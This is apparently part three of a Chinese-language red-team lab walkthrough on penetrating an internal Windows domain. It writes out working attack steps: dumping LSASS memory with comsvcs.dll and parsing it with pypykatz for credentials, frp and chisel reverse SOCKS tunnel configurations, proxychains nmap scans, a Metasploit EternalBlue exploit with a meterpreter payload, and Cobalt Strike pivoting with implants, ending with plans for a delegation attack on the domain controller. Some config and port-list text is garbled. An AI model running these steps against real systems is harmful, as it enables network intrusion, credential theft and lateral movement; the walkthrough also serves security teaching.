msf战队|渗透实战:内网域渗透( 三 )



rundll32.exe C:\\windows\\System32\\comsvcs.dll MiniDump 500 C:\\temp\\lsass.dmp full

rundll32.exe C:\\windows\\System32\\comsvcs.dll MiniDump 500 C:\\windows\\temp\\lsass.dmp full

ls C:\\windows\\temp\\lsass.dmp

download C:\\windows\\temp\\lsass.dmp


lsass.dmp重命名为weblogic.dmp
pypykatz lsa minidump weblogic.dmp -o weblogic.txt

并没有发现预想中存在的密码 , 所以下面换个其他的方法;



解密工具可以解密了;

至此 , web服务器算是搞定了 , 下面开始个人主机的渗透 。
个人主机永恒之蓝利用进入内网 , 个人主机已经无法直接出网了 , 需要搭建代理 。
frp代理
服务端
[common

bind_addr =192.168.223.138
bind_port =7000
token = Xa3BJf2l5enmN6Z7A8mv
[socks5

type = tcp
remote_port =7777
plugin = socks5

客户端
[common

server_addr = 192.168.223.138
server_port = 7000
token = Xa3BJf2l5enmN6Z7A8mv
[plugin_socks

type = tcp
remote_port = 7777
plugin = socks5

proxychains nmap -v -Pn -T3 -sV -n -sT --open -p
22122222222234523214451351395985212133891338963794
50514333306500052365900543215211099539958140993465
87870013899021194108088 10.10.20.7


这里还可以尝试下用chisel;
./chisel server -p 8000 --reverse
./chisel client 192.168.223.138:8000 R:8100:socks


在kali里设置好代理配置;

proxychains nmap --script smb-vuln* -p 445 -sT -Pn 10.10.20.7 -vvv

很明显了 , 永恒之蓝;这里还是用frp代理 , 通过msf来方便点 。
msf6 > setg Proxies socks5:192.168.223.138:7777
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set payload windows/x64/meterpreter/bind_tcp
msf6 > set rhost 10.10.20.7
msf6 > run


成功拿下个人主机 , 照例先抓下密码;

这里在介绍另一种抓取密码的思路 , 在目标机抓取后拿回本地来解密分析 , 在某些场合下会有奇效;

取回本地 , minidump方式解开

查看结果;

为了后续方便 , 我们可以用CobaltStrike来继续 , 虽然msf和CS会话可以互通 , 但我还是习惯直接种马后使用 。 这里web服务器已经提前在CS上反弹好了 , 精华在于CS的中转功能 。
因为此 Win7 不出网 , 随后只能通过 CobaltStrike 设置中转:
先创建中转监听器:



生成木马:利用msf上传并运行木马后机器上线;


信息收集一波;
可以看到个人主机后面还有2台机器 , 分别是域控服务器和数据库服务器 。 在进行下一步渗透之前 , 先需要把二级代理搭建好 。
二级代理搭建先看看frp如何搭建二级代理;
kali上配置服务端;

web服务器上配置;(一个服务端 , 一个客户端)


个人主机上配置客户端;
扫描测试下;在用chisel搭建一个2级代理;

kali上配置服务端;
web服务器上配置客户端和服务端;
个人主机上配置客户端;扫描测试下;
proxychains nmap -sC -sV -F -sT -Pn 10.10.10.18 -vvv

数据库服务器这里先借助bloodhound来分析下域环境 , 以确定下一步的渗透思路 , 具体的安装及使用这里就不赘述了
到达域管理员的最短路径;

用户:redteam.red/sqlserver 允许委托OWA的cifs服务(DC控制器)

至此有了后续基本的渗透思路 , 就是通过委派攻击拿下域控 , 下面开始逐步实施;
根据之前端口扫描的结果 , 做下信息收集;


结合我们已经取得的个人主机控制权 , 首先当前进程是没有域管的 , 所以暂且放弃令牌窃取: